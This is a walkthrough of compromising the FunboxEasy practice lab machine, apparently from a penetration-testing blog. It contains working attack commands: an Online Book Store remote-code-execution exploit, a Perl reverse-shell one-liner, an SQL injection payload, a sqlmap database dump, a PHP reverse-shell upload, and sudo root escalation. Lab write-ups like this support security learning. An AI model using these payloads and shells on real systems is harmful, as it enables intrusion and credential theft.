pg-funboxeasy-play

FunboxEasy

Nmap
nmap 192.168.178.111 -p- -sS -sV
Host is up (0.097s latency).
Not shown: 65532 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
33060/tcp open mysqlx?

Checking out port 80 we have the default install page for Apache 2.

Checking the source on this page reveals no interesting information. From here I executed dirsearch.py against the target machine.

sudo python3 dirsearch.py -u http://192.168.178.111/ -w /usr/share/seclists/Discovery/Web-Content/common.txt –full-url -t 75

Checking the directory /store we are presented a web page for ‘CSE bookstore’.

/store

Researching exploits on Google for ‘CSE bookstore’ we are presented with an exploit for Unauthenticated RCE. The exploit PoC has been linked below.

Online Book Store 1.0 – Unauthenticated Remote Code Execution
Online Book Store 1.0 – Unauthenticated Remote Code Execution.. webapps exploit for PHP platform
www.exploit-db.com

After downloading the PoC I executed it with the following command:

python3 47887.py http://192.168.178.111/store/

When prompted to launch a shell hit ‘y’.

This shell stops us from properly navigating the target machine and will return us back to the current working directory when the command has finished executing. As such I checked what binary’s are installed on the target machine so we can spawn a shell where we can navigate the target properly.

As per above perl is installed on the system. From here I started a netcat listener on my attacking machine.

sudo nc -lvp 80

I then executed the following command to gain a perl reverse shell.

perl -e ‘use Socket;$i=”192.168.49.178″;$p=80;socket(S,PF_INET,SOCK_STREAM,getprotobyname(“tcp”));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,”>&S”);open(STDOUT,”>&S”);open(STDERR,”>&S”);exec(“sh -i”);};’

Moving into the home directory and then into the user tony’s home directory we have passwords.txt. Reading the contents of this text file shows the following information:

ssh: yxcvbnmYYY
gym/admin: asdfghjklXXX
/store: admin@admin.com admin

I then able to login with the SSH password for the user tony.

Checking sudo -l for sudo permissions we come into a multitude of entries.

As we can execute sudo as the user root without supplying a password here We can use pkexec or time to spawn a bash shell as root.

tony@funbox3:/var/www$ sudo /usr/bin/time /bin/bash

root@funbox3:/var/www# id
uid=0(root) gid=0(root) groups=0(root)

Alternative way

Login Bruteforce

We can simply try one of the well-known default credential pairs admin:admin against http://192.168.120.224/store/admin.php. And we will find that we are logged in as the administrator user of this web store.

SQL Injection Vulnerability

Alternatively, we can exploit an SQL injection vulnerability in the unauthenticated portion of this application. Clicking on a book image we are directed to its page with the bookisbn GET parameter, like this:

http://192.168.178.111/store/book.php?bookisbn=978-1-49192-706-9

We can try a simple payload to test for SQLi vulnerabilities ' or 1=1; --, like so:

http://192.168.178.111/store/book.php?bookisbn=%27%20or%201=1;%20--

And we see that this application indeed seems to be vulnerable based on the following verbose error:

Can't retrieve data You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '--'' at line 1

SQLMap

Since the website directory for the store is aptly names store, we can venture an educated guess that the underlying database might also be named store. Using sqlmap, we can automate the exploitation and leak database contents:

kali@kali:~$ sqlmap -u http://192.168.178.111/store/book.php?bookisbn= --dump-all --batch -D store
        ___
       __H__
 ___ ___[,]_____ ___ ___  {1.4.10#stable}
|_ -| . [.]     | .'| . |
|___|_  [']_|_|_|__,|  _|
      |_|V...       |_|   http://sqlmap.org

...

Database: store                                                                                                          
Table: admin
[1 entry]
+-------+--------------------------------------------------+
| name  | pass                                             |
+-------+--------------------------------------------------+
| admin | d033e22ae348aeb5660fc2140aec35850c4da997 (admin) |
+-------+--------------------------------------------------+
...
kali@kali:~$ 

And we have obtained the user credentials admin:admin via this vulnerability.

File Upload Vulnerability

Having logged in with the recovered or guessed credentials admin:admin at http://192.168.120.224/store/admin.php, we are redirected to http://192.168.120.224/store/admin_book.php. This page shows a listing of existing books.

In addition, we see a link to Add new book in the top-left portion of the screen that leads us to http://192.168.120.224/store/admin_add.php. Here, it looks like we are able to upload a new file to the store.

We can try uploading a PHP reverse shell from PentestMonkey:

kali@kali:~$ cp /usr/share/webshells/php/php-reverse-shell.php rev.php

We will be sure to change IP address and port as needed:

kali@kali:~$ cat rev.php 
<?php
// php-reverse-shell - A Reverse Shell implementation in PHP
// Copyright (C) 2007 pentestmonkey@pentestmonkey.net
...

$ip = '192.168.118.3';  // CHANGE THIS
$port = 4444;       // CHANGE THIS
...
kali@kali:~$

There is one caveat in the upload process: the Publisher text field cannot be arbitrary and must be one of several choices. We can easily view these choices on the page http://192.168.120.224/store/publisher_list.php:

kali@kali:~$ curl http://192.168.120.224/store/publisher_list.php
<!DOCTYPE html>
<html lang="en">
  <head>
    <meta charset="utf-8">
...
<div class="container" id="main">   <p class="lead">List of Publisher</p>
        <ul>
                        <li>
                        <span class="badge">2</span>
                    <a href="bookPerPub.php?pubid=1">Wrox</a>
                </li>
                        <li>
                        <span class="badge">2</span>
                    <a href="bookPerPub.php?pubid=2">Wiley</a>
                </li>
                        <li>
                        <span class="badge">3</span>
                    <a href="bookPerPub.php?pubid=3">O'Reilly Media</a>
                </li>
                        <li>
                        <span class="badge">3</span>
                    <a href="bookPerPub.php?pubid=4">Apress</a>
                </li>
                        <li>
                        <span class="badge">0</span>
                    <a href="bookPerPub.php?pubid=5">Packt Publishing</a>
                </li>
                        <li>
                        <span class="badge">1</span>
                    <a href="bookPerPub.php?pubid=6">Addison-Wesley</a>
                </li>
                        <li>
                        <a href="books.php">List full of books</a>
                </li>
        </ul>
...

We see Apress as one of the choices listed, and we will use this publisher label. The rest of the fields can contain arbitrary data, like so:

fileupload

If we now return to http://192.168.120.224/store/admin_book.php, we will see our new entry added to the top of the list:

ISBN 	Title 	Author 	Image 	Description 	Price 	Publisher 	  	 
shell 	shell 	hacker 	php-reverse-shell.php 	shell 	10.00 	Apress 	Edit 	Delete

Next, we will set up a listener on port 4444 and then trigger the reverse shell by navigating to http://192.168.53.111/store/bootstrap/img/rev.php

kali@kali:~$ nc -lvp 4444
listening on [any] 4444 ...
192.168.120.224: inverse host lookup failed: Unknown host
connect to [192.168.118.3] from (UNKNOWN) [192.168.120.224] 38114
Linux funbox3 5.4.0-42-generic #46-Ubuntu SMP Fri Jul 10 00:24:02 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux
 17:16:51 up  1:03,  0 users,  load average: 0.00, 0.00, 0.00
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$

And we have a reverse shell as user www-data.

.

 

Posted on

Leave a Reply

Your email address will not be published. Required fields are marked *